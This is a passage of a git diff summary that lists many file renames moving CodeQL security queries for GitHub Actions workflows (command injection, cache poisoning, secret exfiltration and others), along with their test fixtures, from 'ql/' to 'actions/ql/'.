actions/ql}/src/Security/CWE-275/MissingActionsPermissions.ql (100%) rename {ql => actions/ql}/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql (100%) rename {ql => actions/ql}/src/Security/CWE-285/ImproperAccessControl.md (100%) rename {ql => actions/ql}/src/Security/CWE-285/ImproperAccessControl.ql (100%) rename {ql => actions/ql}/src/Security/CWE-312/ExcessiveSecretsExposure.md (100%) rename {ql => actions/ql}/src/Security/CWE-312/ExcessiveSecretsExposure.ql (100%) rename {ql => actions/ql}/src/Security/CWE-312/SecretsInArtifacts.md (100%) rename {ql => actions/ql}/src/Security/CWE-312/SecretsInArtifacts.ql (100%) rename {ql => actions/ql}/src/Security/CWE-312/UnmaskedSecretExposure.md (100%) rename {ql => actions/ql}/src/Security/CWE-312/UnmaskedSecretExposure.ql (100%) rename {ql => actions/ql}/src/Security/CWE-349/CachePoisoningViaCodeInjection.md (100%) rename {ql => actions/ql}/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql (100%) rename {ql => actions/ql}/src/Security/CWE-349/CachePoisoningViaDirectCache.md (100%) rename {ql => actions/ql}/src/Security/CWE-349/CachePoisoningViaDirectCache.ql (100%) rename {ql => actions/ql}/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md (100%) rename {ql => actions/ql}/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql (100%) rename {ql => actions/ql}/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md (100%) rename {ql => actions/ql}/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md (100%) rename {ql => actions/ql}/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql (100%) rename {ql => actions/ql}/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md (100%) rename {ql => actions/ql}/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md (100%) rename {ql => 
actions/ql}/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/ArtifactPoisoningCritical.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/ArtifactPoisoningCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/ArtifactPoisoningMedium.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/ArtifactPoisoningMedium.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/UnpinnedActionsTag.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/UnpinnedActionsTag.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/UntrustedCheckoutCritical.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/UntrustedCheckoutCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/UntrustedCheckoutHigh.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/UntrustedCheckoutHigh.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/UntrustedCheckoutMedium.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/UntrustedCheckoutMedium.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/UnversionedImmutableAction.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/UnversionedImmutableAction.ql (100%) rename {ql => actions/ql}/src/Security/CWE-918/RequestForgery.ql (100%) rename {ql => actions/ql}/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md (100%) rename {ql => actions/ql}/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql (100%) rename {ql => actions/ql}/src/codeql-pack.lock.yml (100%) rename {ql => actions/ql}/src/codeql-suites/actions-all.qls (100%) rename {ql => actions/ql}/src/codeql-suites/actions-bughalla.qls (100%) rename {ql => actions/ql}/src/codeql-suites/actions-code-scanning.qls (100%) rename {ql => actions/ql}/src/codeql-suites/actions-security-and-quality.qls (100%) rename {ql => 
actions/ql}/src/codeql-suites/actions-summaries-queries.qls (100%) rename {ql => actions/ql}/src/qlpack.yml (100%) rename {ql => actions/ql}/test/codeql-pack.lock.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/commands.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/expression_nodes.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/multiline.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/multiline2.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/poisonable_steps.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/shell.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/test.yml (100%) rename {ql => actions/ql}/test/library-tests/commands.expected (100%) rename {ql => actions/ql}/test/library-tests/commands.ql (100%) rename {ql => actions/ql}/test/library-tests/poisonable_steps.expected (100%) rename {ql => actions/ql}/test/library-tests/poisonable_steps.ql (100%) rename {ql => actions/ql}/test/library-tests/test.expected (100%) rename {ql => actions/ql}/test/library-tests/test.ql (100%) rename {ql => actions/ql}/test/library-tests/workflowenum.expected (100%) rename {ql => actions/ql}/test/library-tests/workflowenum.ql (100%) rename {ql => actions/ql}/test/qlpack.yml (100%) rename {ql => actions/ql}/test/query-tests/Models/.github/workflows/calling_composite.yml (100%) rename {ql => actions/ql}/test/query-tests/Models/.github/workflows/calling_workflow.yml (100%) rename {ql => actions/ql}/test/query-tests/Models/.github/workflows/reusable_workflow.yml (100%) rename {ql => actions/ql}/test/query-tests/Models/CompositeActionsSinks.expected (100%) rename {ql => actions/ql}/test/query-tests/Models/CompositeActionsSinks.qlref (100%) rename {ql => actions/ql}/test/query-tests/Models/CompositeActionsSources.expected (100%) rename {ql => 
actions/ql}/test/query-tests/Models/CompositeActionsSources.qlref (100%) rename {ql => actions/ql}/test/query-tests/Models/CompositeActionsSummaries.expected (100%) rename {ql => actions/ql}/test/query-tests/Models/CompositeActionsSummaries.qlref (100%) rename {ql => actions/ql}/test/query-tests/Models/ReusableWorkflowsSinks.expected (100%) rename {ql => actions/ql}/test/query-tests/Models/ReusableWorkflowsSinks.qlref (100%) rename {ql => actions/ql}/test/query-tests/Models/ReusableWorkflowsSources.expected (100%) rename {ql => actions/ql}/test/query-tests/Models/ReusableWorkflowsSources.qlref (100%) rename {ql => actions/ql}/test/query-tests/Models/ReusableWorkflowsSummaries.expected (100%) rename {ql => actions/ql}/test/query-tests/Models/ReusableWorkflowsSummaries.qlref (100%) rename {ql => actions/ql}/test/query-tests/Models/action1/action.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-074/.github/workflows/output1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-074/.github/workflows/output2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml (100%) rename {ql => 
actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/path1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test10.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test11.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test12.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test13.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test14.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test15.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test16.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test17.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test18.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test19.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test6.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test7.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test8.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test9.yml 
(100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected (100%) 
rename {ql => actions/ql}/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/level0.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/level1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/push.yml (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test10.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test11.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test12.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test13.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test14.yml (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test15.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test16.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test17.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test18.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test19.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test20.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test21.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test22.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test23.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test24.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test25.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test26.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test27.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test28.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test29.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test4.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test5.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test6.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test7.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test8.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test9.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-200/.github/workflows/test1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-200/SecretExfiltration.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-200/SecretExfiltration.qlref (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-284/.github/workflows/test1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-284/.github/workflows/test2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-285/.github/workflows/test1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-285/.github/workflows/test2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-285/ImproperAccessControl.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-312/.github/workflows/test1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/actor.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/comment.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/label.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test0.yml (100%)
rename {ql =>
actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test3.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test4.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test5.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/.github/workflows/test6.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-571/.github/workflows/test1.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-571/.github/workflows/test2.yml (100%)
rename {ql => actions/ql}/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected (100%)
